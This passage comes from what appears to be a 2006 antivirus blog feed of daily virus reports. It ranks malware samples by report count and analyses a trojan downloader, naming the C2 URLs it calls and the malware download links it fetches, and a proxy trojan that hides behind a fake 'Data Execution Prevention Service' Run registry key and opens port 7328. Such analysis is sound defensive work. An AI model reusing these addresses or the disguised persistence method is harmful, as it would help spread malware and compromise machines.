TEXT-ALIGN: left">194</span></span></font></div></td></tr></tbody></table></span><div></div></td></tr><tr id="L023808C013F83CDB"><td style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width="555"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 229px" width="229" /><col style="WIDTH: 166px" width="166" /></colgroup><tbody valign="top"><tr><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="229"><font face="宋体"><div><span><span id="L023809401630461E" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">keyboard5.exe</span></span></div></font></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="166"><div><font face="宋体"><span><span id="L0238098018684FA1" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">164</span></span></font></div></td></tr></tbody></table></span><div></div></td></tr><tr id="L023809C01AA05964"><td style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width="555"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 229px" width="229" /><col style="WIDTH: 166px" width="166" /></colgroup><tbody valign="top"><tr><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="229"><font face="宋体"><div><span><span id="L02380A401CD863A7" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">dpnss32.exe</span></span></div></font></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="166"><div><font face="宋体"><span><span id="L02380A801F106E2A" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">113</span></span></font></div></td></tr></tbody></table></span><div></div></td></tr></tbody></table></span><div></div></td></tr><tr style="MIN-HEIGHT: 118px"><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="562"><div><font face="Arial"><strong>技术分析</strong></font></div><span><span id="L02380B402148796D" title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 540px" width="540" /></colgroup><tbody valign="top"><tr style="MIN-HEIGHT: 16px"><td style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width="540"><span><table title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border="1"><colgroup><col style="WIDTH: 223px" width="223" /><col style="WIDTH: 313px" width="313" /></colgroup><tbody><tr id="L02380BC023808530"><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="223"><span><span id="L02380C0025B89133" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">newname5.exe</span></span></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="313"><span><span id="L02380C4027F09D76" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">TrojanDownloader</span></span></td></tr><tr id="L02380C802A28A9F9"><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="223"><span><span id="L02380CC02C60B6BC" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">mousepad5.exe</span></span></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="313"><span><span id="L02380D002E98C3BF" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">TrojanClicker</span></span></td></tr><tr id="L02380D4030D0D102"><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="223"><span><span id="L02380D803308DE85" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">keyboard5.exe</span></span></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="313"><span><span id="L02380DC03540EC48" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">TrojanDownloader</span></span></td></tr></tbody></table></span><div></div></td></tr><tr style="MIN-HEIGHT: 17px"><td style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width="540"><div><span><span id="L02380E403778FA8B" title="" style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word">和以前描述过的keyboard2.exe, keyboard3.exe, keyboard4.exe功能类似，是个变种。<br />keyboard5.exe是个木马下载器。<br />运行后，首先向一个网络asp脚本提交新增感染报告，提交形式如下：<br /><a href="http://www.nonameforthisdomain.com/teller2.asp?rnd">http://www.nonameforthisdomain.com/teller2.asp?rnd</a>=[随机数]<br />然后获得一个要下载程序的列表：<br /><a href="http://www.nonameforthisdomain.com/data.asp?rnd">http://www.nonameforthisdomain.com/data.asp?rnd</a>=[随机数]&amp;amp;antisp=1<br />当前下载列表的内容如下：<br /><a href="http://content.dollarrevenue.com/keyboard5.exe">http://content.dollarrevenue.com/keyboard5.exe</a>，就是keyboard5.exe本身<br /><a href="http://content.dollarrevenue.com/mousepad5.exe">http://content.dollarrevenue.com/mousepad5.exe</a>，一个广告点击程序，可能弹出广告窗口<br /><a href="http://content.dollarrevenue.com/newname5.exe">http://content.dollarrevenue.com/newname5.exe</a>，木马下载器<br /></span></span></div></td></tr></tbody></table></span><div></div></span><div></div><span id="L023814C039B10F4E" title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 540px" width="540" /></colgroup><tbody valign="top"><tr style="MIN-HEIGHT: 16px"><td style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width="540"><span><table title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border="1"><colgroup><col style="WIDTH: 223px" width="223" /><col style="WIDTH: 313px" width="313" /></colgroup><tbody><tr id="L023815403BE92491"><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="223"><span><span id="L023815803E213A14" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">dpnss32.exe</span></span></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="313"><span><span id="L023815C040594FD7" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">TrojanProxy.Ranky</span></span></td></tr></tbody></table></span><div></div></td></tr><tr style="MIN-HEIGHT: 17px"><td style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width="540"><div><span><span id="L023816404291661A" title="" style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word"><div>病毒运行后，将创建下列文件：<br />%SystemDir%\dpnss32.exe, 21257字节<br />在注册表中添加下列启动项：<br />[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<br />&amp;quot;Microsoft (R) Windows Data Execution Prevention Service&amp;quot; = %SystemDir%\dpnss32.exe<br />这样，在Windows启动时，病毒就可以自动执行。<br /></div><div>开启后门代理端口TCP 7328, 黑客可以远程使用这些代理端口，将被感染计算机作为跳板（代理），进行黑客活动。</div><div>&amp;nbsp;</div></span></span></div></td></tr></tbody></table></span><div></div></span><div></div></span><div></div></td></tr></tbody></table></span>]]></description> 
<dc:subject><![CDATA[病毒反病毒]]></dc:subject> 
<dc:creator><![CDATA[daishuo]]></dc:creator> 
<dc:date>2006-03-24T12:37:52Z</dc:date> 
</item> 
<item rdf:about="http://daishuo.bokee.com/4726109.html"> 
<title><![CDATA[昨日病毒(2006.03.22)]]></title> 
<link>http://daishuo.bokee.com/4726109.html</link> 
<description><![CDATA[<span>&amp;nbsp;<table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 562px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 562px" width="562" /></colgroup><tbody valign="top"><tr style="MIN-HEIGHT: 41px"><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #99ccff" width="562"><div><strong><font face="Arial">昨日病毒</font></strong></div></td></tr><tr style="MIN-HEIGHT: 31px"><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="562"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 295px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 146px" width="146" /><col style="WIDTH: 149px" width="149" /></colgroup><tbody valign="top"><tr><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="146"><div><font face="Arial"><strong>统计时段</strong></font></div></td><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="149"><div><font face="宋体"><div title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline; FONT-SIZE: x-small; MARGIN: 1px 1px 2px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; BACKGROUND-COLOR: window"><span id="L025D04E004BA05E6" style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; OVERFLOW: hidden; WIDTH: 100%; MARGIN-RIGHT: 22px; PADDING-TOP: 0px; WHITE-SPACE: nowrap; HEIGHT: 100%">2006-3-22</span><span style="MARGIN-LEFT: -21px; WIDTH: 20px; HEIGHT: 18px"></span></div></font></div></td></tr></tbody></table></span><div></div></td></tr><tr><td style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width="562"><span><table title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 555px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border="1"><colgroup><col style="WIDTH: 555px" width="555" /></colgroup><tbody><tr><td style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width="555"><div><strong><font face="Arial">病毒样本上报数排行</font></strong></div><div><strong><font face="Arial"></font></strong>&amp;nbsp;</div><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 394px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 229px" width="229" /><col style="WIDTH: 165px" width="165" /></colgroup><tbody valign="top"><tr style="MIN-HEIGHT: 22px"><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="229"><div align="center"><font face="Arial">样本文件名</font></div></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width="165"><div align="center"><font face="Arial">上报次数</font></div></td></tr></tbody></table></span><div></div></td></tr></tbody><tbody><tr id="L025D06A007170C89"><td style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width="555"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 229px" width="229" /><col style="WIDTH: 166px" width="166" /></colgroup><tbody valign="top"><tr><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="229"><font face="宋体"><div><span><span id="L025D0720097413AC" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">313.exe</span></span></div></font></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="166"><div><font face="宋体"><span><span id="L025D07600BD11B0F" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">175</span></span></font></div></td></tr></tbody></table></span><div></div></td></tr><tr id="L025DC0401C5D0CC4"><td style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width="555"><span><table style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" bordercolor="buttontext" border="1"><colgroup><col style="WIDTH: 229px" width="229" /><col style="WIDTH: 166px" width="166" /></colgroup><tbody valign="top"><tr><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="229"><font face="宋体"><div><span><span id="L025DC0C01EBACD87" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">iplus.exe</span></span></div></font></td><td style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width="166"><div><font face="宋体"><span><span id="L025DC10021188E8A" title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">94</span></span></font></div></td></tr></tbody></table></span><div></div></td></tr></tbody></table></span><div></div></td></tr><tr style="MIN-HEIGHT: 